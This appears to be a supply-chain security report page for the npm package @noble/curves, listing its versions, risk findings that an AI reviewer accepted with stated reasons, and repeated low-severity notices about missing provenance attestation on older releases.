← Home

@noble/curves

npm Repository Homepage

Audited & minimal JS implementation of elliptic curve cryptography

48
Versions
MIT
License
No
Install Scripts
Verified
Provenance

Supply chain provenance

Status for the latest visible version.

SLSA provenance attestation npm registry signatures gitHead linked

Maintainers

paulmillr

Keywords

cryptographysecp256k1ed25519p256p384p521secp256r1ed448x25519ed25519bls12-381bn254alt_bn128blsnobleeccecdsaeddsaoprfschnorrfft

Accepted risks

Findings the reviewer chose to accept rather than block on.

SourceRuleReasonAccepted byWhen
source-diff large-new-source-files AI (source-diff): Noble-curves legitimately adds many new curve implementations (BLS12-381, ed448, p192, p224, p384, p521, pasta, stark, jubjub, etc.) as the library expands; large file counts are expected for this package. ai
publish-pattern new-deps-added AI (publish-pattern): @noble/hashes is Paul Miller's own companion library in the noble suite; adding it as a runtime dep is expected and not a supply-chain risk for this package. ai
source-diff source-size-tripled AI (source-diff): Size growth reflects legitimate expansion of curve implementations (especially BLS12-381 ~54KB each for CJS/ESM). Expected for a growing cryptography library. ai
source-diff net-exec-file:src/abstract/oprf.ts AI (source-diff): Legitimate RFC 9497 OPRF cryptographic implementation; URLs are documentation references, not network calls or dynamic execution. ai
source-diff net-exec-file:abstract/oprf.d.ts AI (source-diff): OPRF type definition file; URL references are RFC documentation links, not network calls. No actual dynamic code execution present. ai
source-diff net-exec-file:abstract/frost.js AI (source-diff): FROST is a legitimate RFC 9591 threshold signature protocol implementation. 'Network' references are protocol semantics, not actual network I/O. No HTTP/fetch calls present in the sample. ai
provenance publisher-changed AI (provenance): paulmillr migrated to GitHub Actions CI/CD publishing with SLSA provenance attestation. This is a supply chain improvement, not a compromise. Stable for this package going forward. ai
publish-pattern dormant-publish AI (publish-pattern): Dormancy explained by major feature development (FROST threshold signatures) and CI/CD migration. SLSA provenance confirms legitimate publish pipeline. ai
source-diff net-exec-file:src/abstract/frost.ts AI (source-diff): TypeScript source for FROST RFC 9591 implementation. Same false positive as the compiled JS — no actual network calls or dynamic code execution present. ai

Versions (showing 48 of 48)

Version Deps Published
2.2.0 1 / 5
2.0.1 1 / 5
2.0.0 1 / 5
1.9.7 1 / 7
1.9.6 1 / 7
1.9.5 1 / 7
1.9.4 1 / 7
1.9.3 1 / 7
1.9.2 1 / 7
1.9.1 1 / 6
1.9.0 1 / 6
1.8.2 1 / 6
1.8.1 1 / 6
1.7.0 1 / 6
1.6.0 1 / 6
1.5.0 1 / 6
1.4.2 1 / 6
1.4.1 1 / 6
1.4.0 1 / 5
1.3.0 1 / 5
1.2.0 1 / 5
1.1.0 1 / 5
1.0.0 1 / 5
0.9.1 1 / 8
0.9.0 1 / 8
0.8.3 1 / 8
0.8.2 1 / 8
0.8.1 1 / 8
0.8.0 1 / 8
0.7.3 1 / 8
0.7.2 1 / 8
0.7.1 1 / 8
0.7.0 1 / 8
0.6.4 1 / 9
0.6.3 1 / 9
0.6.2 1 / 11
0.6.1 1 / 11
0.6.0 1 / 11
0.5.2 1 / 11
0.5.1 1 / 11
0.5.0 1 / 11
0.4.0 0 / 6
0.3.2 1 / 10
0.3.1 1 / 10
0.3.0 1 / 10
0.2.1 0 / 6
0.2.0 0 / 6
0.1.0 0 / 6

v0.9.1

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.9.0

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.8.3

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.8.2

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.8.1

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.7.3

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.7.2

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.7.1

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.7.0

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.6.4

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.6.3

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.6.2

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.6.1

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.

v0.6.0

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.5.2

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.5.1

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.5.0

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

v0.4.0

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.

v0.3.2

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.

v0.3.1

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.

v0.3.0

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.

v0.2.1

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.

v0.2.0

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.

v0.1.0

1 finding
LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.